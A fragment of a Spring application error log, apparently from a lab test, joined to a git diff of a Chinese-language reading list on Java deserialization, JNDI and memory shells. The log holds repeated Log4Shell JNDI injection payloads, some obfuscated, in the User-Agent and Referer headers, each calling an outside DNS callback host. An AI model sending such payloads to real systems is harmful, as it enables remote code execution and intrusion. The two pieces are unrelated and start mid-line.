(KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://2.get.127.0.0.1.8005.ewP21.hpdth2.ceye.io/ user} -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://2.get.127.0.0.1.8005.OPY30.hpdth2.ceye.io/ user} -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://2.get.127.0.0.1.8005.ewP31.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :%24{jndi:dns://2.get.127.0.0.1.8005.81P20.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :%24{j%24{::-n}di:dns://2.get.127.0.0.1.8005.apc21.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.81P20.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.apc21.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :${jndi:dns://2.get.127.0.0.1.8005.81P30.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :${j${::-n}di:dns://2.get.127.0.0.1.8005.apc31.hpdth2.ceye.io/ user} -2025-12-08 14:34:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.81P30.hpdth2.ceye.io/ user} -2025-12-08 14:34:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.apc31.hpdth2.ceye.io/ user} -2025-12-08 14:35:36 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:35:36 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:35:42 ERROR com.example.spring.controller.IndexController - Referer: :${jndi:dns://2.get.127.0.0.1.8005.1rk3.hpdth2.ceye.io/ user} -2025-12-08 14:35:43 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.1rk3.hpdth2.ceye.io/ user} diff --git a/README.md b/README.md index 2fa4a02..bbdd6df 100644 --- a/README.md +++ b/README.md @@ -201,7 +201,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [Java反序列化之C3P0链 | Drunkbaby's Blog](https://drun1baby.top/2022/10/06/Java反序列化之C3P0链/) c3p0,可以打二次反序列化 -[分析尝试利用tabby挖掘-SpringAOP链 - Potat0w0](https://blog.potatowo.top/2025/03/31/从复现到尝试用tabby挖掘-SpringAOP链/) +[分析尝试利用tabby挖掘-SpringAOP链 - Potat0w0](https://blog.potatowo.top/2025/03/31/从复现到尝试用tabby挖掘-SpringAOP链/) [realworldctf old system复盘(jdk1.4 getter jndi gadget)-先知社区](https://xz.aliyun.com/news/8630) LdapAttribute链 @@ -225,6 +225,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [JNDI · 攻击Java Web应用-Java Web安全](https://www.javasec.org/javase/JNDI/#jndi) 里面引用了一篇命名和目录服务基本概念的文章,记得看,对后面理解RMI和LDAP很有帮助,很多东西都会在调试里遇到 +[Log4j2漏洞分析 | 1diot9's Blog](https://1diot9.github.io/2025/12/08/Log4j2漏洞分析/) + =========================快速入门的话,可以先只看上面部分的========================= ## RMI、JRMP、JEP290、LDAP @@ -243,7 +245,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 下面整理当时看的部分文章 -### 整合类 +### 综合梳理 [奇安信攻防社区-JAVA JRMP、RMI、JNDI、反序列化漏洞之间的风花雪月](https://forum.butian.net/share/2278) 这个感觉最清楚,底下的参考文章也看看 @@ -457,14 +459,16 @@ payload缩短这部分内容挺多的,感觉能单独研究了。 =====================快速入门的话,可以先只看上面的几篇文章====================== -[bitterzzZZ/MemoryShellLearn: 分享几个直接可用的内存马,记录一下学习过程中看过的文章](https://github.com/bitterzzZZ/MemoryShellLearn) +[bitterzzZZ/MemoryShellLearn: 分享几个直接可用的内存马,记录一下学习过程中看过的文章](https://github.com/bitterzzZZ/MemoryShellLearn) -[Getshell/Mshell: Memshell-攻防内存马研究](https://github.com/Getshell/Mshell) +[Getshell/Mshell: Memshell-攻防内存马研究](https://github.com/Getshell/Mshell) -[W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马,公众号:追梦信安](https://github.com/W01fh4cker/LearnJavaMemshellFromZero) +[W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马,公众号:追梦信安](https://github.com/W01fh4cker/LearnJavaMemshellFromZero) 上面这三篇都是内存马学习的相关项目,里面有很多优秀的文章和案例代码 +[浅谈 Java Agent 内存马 – 天下大木头](https://wjlshare.com/archives/1582) + [奇安信攻防社区-Solon框架注入内存马](https://forum.butian.net/share/3700) 里面提到的Java Object Searcher值得学习 [c0ny1/java-object-searcher: java内存对象搜索辅助工具](https://github.com/c0ny1/java-object-searcher)